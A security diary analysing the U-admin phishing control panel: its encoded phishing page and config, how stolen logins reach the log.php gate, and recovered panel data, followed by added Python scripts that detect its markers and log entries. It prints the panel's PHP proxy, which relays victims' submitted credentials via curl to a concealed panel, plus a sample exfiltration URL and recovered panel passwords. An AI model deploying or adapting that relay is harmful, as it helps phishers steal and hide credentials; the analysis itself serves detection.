This is a guest diary provided by Remco Verhoef.

A few months ago we had an investigation regarding an ongoing phishing attack. While researching the case we encountered the U-admin control panel, version 2.7, and we were able to collect the source code for the panel.

Of all the control panels we've seen, this one looks quite fresh and professional: apart from the English spelling errors, it offers user management, plugins, news, and localization. The panel uses a modern-ish stack consisting of PHP, Bootstrap, Angular, and jQuery. The underlying database is SQLite3, which makes it easy to deploy on any (hacked) server.

The phishing page itself consists of an encoded JavaScript file that contains the body of the page. The script uses a function named _kaktys_encode to decode the body; this function name is very specific to this attack. Other characteristics of the phishing websites are the files css.css and form.js, and the use of a uniquely generated URL for each individual session. After decoding the script, the configuration is revealed. It consists of several fields, such as the bid (project identifier), the control panel home (the log.php gate that receives the data) and the bb_link to redirect to once data has been entered.

<script type="text/javascript">
var bid = "e99f1d4f321797d2df39fef871cffb93"
var php_js = {"device":"null","texts":"{}","lng":"en","file":"somefilelink","query":"i=1","link":"link","bb_link":"https:\/\/x.y.z\/inloggen","home":"http:\/\/127.0.0.1:8089\/uadmin\/gates\/log.php","relative_root":"..\/..\/","parent_folders":"e99f1d4f321797d2df39fef871cffb93\/login\/"}</script>
<script type="text/javascript" src="form/form.js?v=5a36bc91d4199"></script>
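As an added example (not code from the diary or from the panel itself), the Python script below triages a captured page body for the markers named above (_kaktys_encode, css.css, form.js, the php_js config and the gates/log.php path) and pulls the bid, panel home and bb_link out of the config. The sample page, its hostnames and its bid are constructed placeholders.

```python
import json
import re

# Constructed sample, modelled on the page fragment above. The bid, the
# panel host and the bb_link target are made-up placeholder values.
SAMPLE_PAGE = r'''<link rel="stylesheet" href="css.css">
<script type="text/javascript">
var bid = "0123456789abcdef0123456789abcdef"
var php_js = {"device":"null","texts":"{}","lng":"en","file":"f","query":"i=1","link":"link","bb_link":"https:\/\/bank.example\/inloggen","home":"http:\/\/panel.example\/uadmin\/gates\/log.php","relative_root":"..\/..\/","parent_folders":"0123456789abcdef0123456789abcdef\/login\/"}</script>
<script type="text/javascript" src="form/form.js?v=5a36bc91d4199"></script>
<script>document.write(_kaktys_encode(body));</script>'''

# Static markers named in the diary: decoder function, helper files,
# the config variable and the panel's gate path (also in its JSON \/ form).
INDICATORS = {
    "kaktys_decoder": re.compile(r"_kaktys_encode\s*\("),
    "css_css": re.compile(r"\bcss\.css\b"),
    "form_js": re.compile(r"form/form\.js"),
    "php_js_config": re.compile(r"var\s+php_js\s*=\s*\{"),
    "uadmin_gate": re.compile(r"\\?/uadmin\\?/gates\\?/log\.php"),
}

def match_indicators(html):
    """Names of the U-admin markers present in a captured page body."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(html))

def extract_config(html):
    """Pull bid, panel home and redirect target out of the php_js config."""
    bid = re.search(r'var\s+bid\s*=\s*"([0-9a-f]{32})"', html)
    start = re.search(r"var\s+php_js\s*=\s*", html)
    if not start:
        return None
    # raw_decode copes with the nested braces in "texts":"{}" and the \/
    # escapes, where a non-greedy {.*?} regex would stop too early.
    cfg, _ = json.JSONDecoder().raw_decode(html, start.end())
    return {
        "bid": bid.group(1) if bid else None,
        "home": cfg.get("home"),
        "bb_link": cfg.get("bb_link"),
    }

def triage(html):
    """Combine marker hits and extracted config into one verdict."""
    hits = match_indicators(html)
    return {"suspect": len(hits) >= 2, "indicators": hits,
            "config": extract_config(html)}

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_PAGE), indent=2))
```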

When a phished user has entered confidential information, all data is forwarded through the proxy script to the panel, which shows it in the logs section. The phisher-admin can add notes to an entry, and multiple entries from the same session are grouped together. The panel records the user agent, remote address, entered fields and comments. The submission is made with a URL-encoded ajax call to log.php similar to the following:

/uadmin/gates/log.php?sl&done&link=link&bid=e99f1d4f321797d2df39fef871cffb93&callback=jQuery311026500820959929117_1523363191308&data={"f2a140da-3b09-4204-a088-e8a2f5b7fcc8":"arstarstarst","UserName":"user","Password":"1234"}&_=1523363191309

Once data has been received, the phishing administrator can choose to be notified via Jabber; notifications can be configured to fire on every data save or whenever a new bot registers.

The phisher-admin can ban certain bids, which filters the entries for those bids out of the log view. This is probably used to filter out outdated campaigns or to remove garbage entries.

Using the control panel it is possible to generate a proxy script (e.g. the $real_home variable is filled in with the panel's address). All requests to the proxy script are forwarded to the real U-admin panel. The proxy script can be placed on a third server, effectively frustrating ongoing investigations by hiding the panel.

<?php
// Picks the first forwarding header that is present; the script trusts
// client-supplied headers, so the recorded "victim" address is whatever
// the client sends in them.
function get_ip_address() {
    foreach (array('HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
        if (array_key_exists($key, $_SERVER) === true) {
            foreach (explode(',', $_SERVER[$key]) as $ip) {
                $ip = trim($ip);
                return $ip;
            }
        }
    }
}
$_SERVER['REMOTE_ADDR'] = get_ip_address();

//http://localhost/uadmin/gates/log.php?callback=fun&link=123

header('Content-Type: application/json');
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
// Filled in by the panel when the proxy script is generated; this is the
// address of the real panel the relay hides.
$real_home = "http://127.0.0.1/uadmin/gates/log.php";
$query = $_SERVER['QUERY_STRING'];
if (isset($_GET['callback'])) {
    // Replay the original query string against the real panel, appending
    // the victim address as &ip= and repeating it in two custom headers.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $real_home . "?" . $query . "&ip=" . $ip);
    //curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, $ua);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array("REMOTE_ADDR: $ip", "X_FORWARDED_FOR: $ip"));
    curl_exec($ch);
}
?>
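The Python script below is an added example, not part of the diary or the panel: it runs over constructed web-server access log lines and flags log.php submissions of the kind shown earlier (bid, callback and data parameters), extracting the bid and the submitted field names, and uses the &ip= parameter that the proxy script above appends to tell relayed requests from direct ones. The log lines, hosts and bid are made up.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access log lines (hosts, bid and timestamps are
# made up). Line 1 is a direct victim submission, line 2 the same call
# relayed through the proxy script, line 3 unrelated traffic.
LOG_LINES = [
    '203.0.113.5 - - [10/Apr/2018:12:26:31 +0000] "GET /uadmin/gates/log.php'
    '?sl&done&link=link&bid=0123456789abcdef0123456789abcdef'
    '&callback=jQuery311026500820959929117_1523363191308'
    '&data=%7B%22UserName%22%3A%22user%22%2C%22Password%22%3A%221234%22%7D'
    '&_=1523363191309 HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Apr/2018:12:26:32 +0000] "GET /uadmin/gates/log.php'
    '?sl&done&link=link&bid=0123456789abcdef0123456789abcdef&callback=jQuery3_1'
    '&data=%7B%22UserName%22%3A%22u2%22%7D&_=1&ip=192.0.2.9 HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '192.0.2.1 - - [10/Apr/2018:12:27:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.58"',
]

REQUEST_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

def parse_exfil(line):
    """Summarise a U-admin log.php submission, or return None for other traffic."""
    m = REQUEST_RX.match(line)
    if not m:
        return None
    src_ip, target = m.groups()
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)
    # A gate call carries the bid, a JSONP callback and the JSON-encoded form.
    if not parts.path.endswith("/gates/log.php") or not {"bid", "callback", "data"}.issubset(qs):
        return None
    try:
        fields = json.loads(qs["data"][0])
    except ValueError:
        fields = {}
    # The proxy appends &ip=<victim>, so its presence means the socket peer is the relay.
    via_proxy = "ip" in qs
    return {
        "bid": qs["bid"][0],
        "fields": sorted(fields),  # field names only, never the submitted values
        "via_proxy": via_proxy,
        "victim_ip": qs["ip"][0] if via_proxy else src_ip,
        "proxy_ip": src_ip if via_proxy else None,
    }

def scan(lines):
    """Run parse_exfil over an access log and keep the hits."""
    return [hit for hit in map(parse_exfil, lines) if hit]
```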

Another interesting fact is that the panel contains a news section. This could indicate that the panel is delivered in a more structured and professional way than others.

There are two databases: .ht_users.db, which is used for the control panel users, and .htBd.db, which contains all log entries. Using the SQLite3 recovery tool "undark", I was able to recover previous username and password entries:

werwe:wop0t3xr admin:123 admin:Brazil123 max:venjka anus:qwe

Recovering the log entries, skipping the obscenities, gave some interesting information about other uses of the panel. The panel had previously been used by another phishing campaign targeting Ethereum wallets via a cloned www.myetherwallet.com site (more information can be found at https://www.reddit.com/r/CryptoCurrency/comments/7uzk0f/beware_myetherwallet_clone_found_also_running_a/). Other targets include "bitcoin-tips.com", "bankofmontreal.com", "Netflix", "ING Direct", "unicredit.it", "sparkasse.de", "PayPal" and the latest target, "nab.com.au". Besides those targets, there are many more.

Another interesting artifact, found in adm.php, is a reference to the Codepen http://codepen.io/kaktys/pen/Zpgpqe.js. This Codepen contains specifics from the panel itself, which could indicate a relation between Kaktys and the control panel.

This leads me to the conclusion of this article. Looking at the professionalism of the code, the layout and the functionality, I'm giving this control panel 3 out of 5 stars. We wanted to give them 4 stars, but we took one star off because of an SQL injection vulnerability.

Bonus screenshots:
